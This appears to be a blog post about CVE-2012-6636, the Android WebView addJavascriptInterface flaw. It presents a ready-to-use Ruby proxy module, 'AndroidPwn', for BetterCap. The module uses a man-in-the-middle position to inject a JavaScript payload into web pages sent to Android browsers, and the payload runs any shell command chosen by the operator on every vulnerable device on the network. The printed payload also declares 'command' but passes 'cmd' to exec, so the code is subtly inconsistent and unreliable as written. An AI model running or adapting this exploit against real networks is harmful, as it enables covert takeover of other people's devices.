Autopwn every Android < 4.2 device on your network using BetterCap and the addJavascriptInterface vulnerability.

 Recently I've been playing with Android's WebView based vulnerabilities, focusing on how to exploit them using a MITM attack.
One of the most interesting ones is the addJavascriptInterface vulnerability ( CVE-2012-6636 ) which affects every device running a version older than Android 4.2.

NOTE

The original title of this post was Autopwn every Android device on your network using BetterCap and the "addJavascriptInterface" vulnerability and some people pointed out it's a misleading title since "every Android != every Android < 4.2". I totally agree with them, it wasn't intentional, the point of this post itself was not to show some uber 0day technique, but just to show how easy it is to use bettercap in order to exploit such type of vulnerabilities.

There's an excellent post about this vulnerability, long story short, if there's an app which is using a WebView UI control and it's declaring a custom javascript interface for it like so:

public class WebViewGUI extends Activity {
WebView mWebView;
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
mWebView=new WebView(this);
mWebView.getSettings().setJavaScriptEnabled(true);
mWebView.addJavascriptInterface(new JavaScriptInterface(), "jsinterface");
mWebView.loadUrl("file:///android_asset/www/index.html");
setContentView(mWebView);
}

final class JavaScriptInterface {
JavaScriptInterface () { }
public String getSomeString() {
return "string";
}
}
}
view rawjsinterface.java hosted with ❤ by GitHub
you can inject some special javascript into that page and make that device execute any shell command you want.

In this post, I'd like to show how easy it is to automatically exploit every vulnerable device on your network using bettercap and for this purpose I've wrote the AndroidPwn transparent proxy module.

class AndroidPwn < BetterCap::Proxy::Module
@@command = nil
@@payload = "<script>\n" +
"var command = ['/system/bin/sh','-c','COMMAND_HERE'];\n" +
"for(i in top) {\n" +
" try {\n" +
" top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);\n" +
" break;\n" +
" }\n" +
"catch(e) {}\n" +
"}\n" +
"</script>"

def self.on_options(opts)
opts.separator ""
opts.separator "AndroidPwn Proxy Module Options:"
opts.separator ""

opts.on( '--command STRING', 'Shell command(s) to execute.' ) do |v|
@@command = v.strip
@@payload['COMMAND_HERE'] = @@command.gsub( "'", "\\\\'" )
end
end

def initialize
raise BetterCap::Error, "No --command option specified for the proxy module." if @@command.nil?
end

def on_request( request, response )
if is_exploitable?( request, response )
BetterCap::Logger.info ""
BetterCap::Logger.info "Pwning Android Device :".red
BetterCap::Logger.info " URL : http://#{request.host}#{request.url}"
BetterCap::Logger.info " AGENT : #{request.headers['User-Agent']}"
BetterCap::Logger.info ""

response.body.sub!( '</head>', "</head>#{@@payload}" )
end
end

private

def is_exploitable?(req,res)
req.headers.has_key?('User-Agent') and \
req.headers['User-Agent'].include?("Android") and \
req.headers['User-Agent'].include?("AppleWebKit") and \
res.content_type =~ /^text\/html.*/ and \
res.code == '200'
end
end

Leave it running and it will automatically perform a Man-In-The-Middle attack on your network and execute the command(s) you've chosen on every single Android device it will find on the network.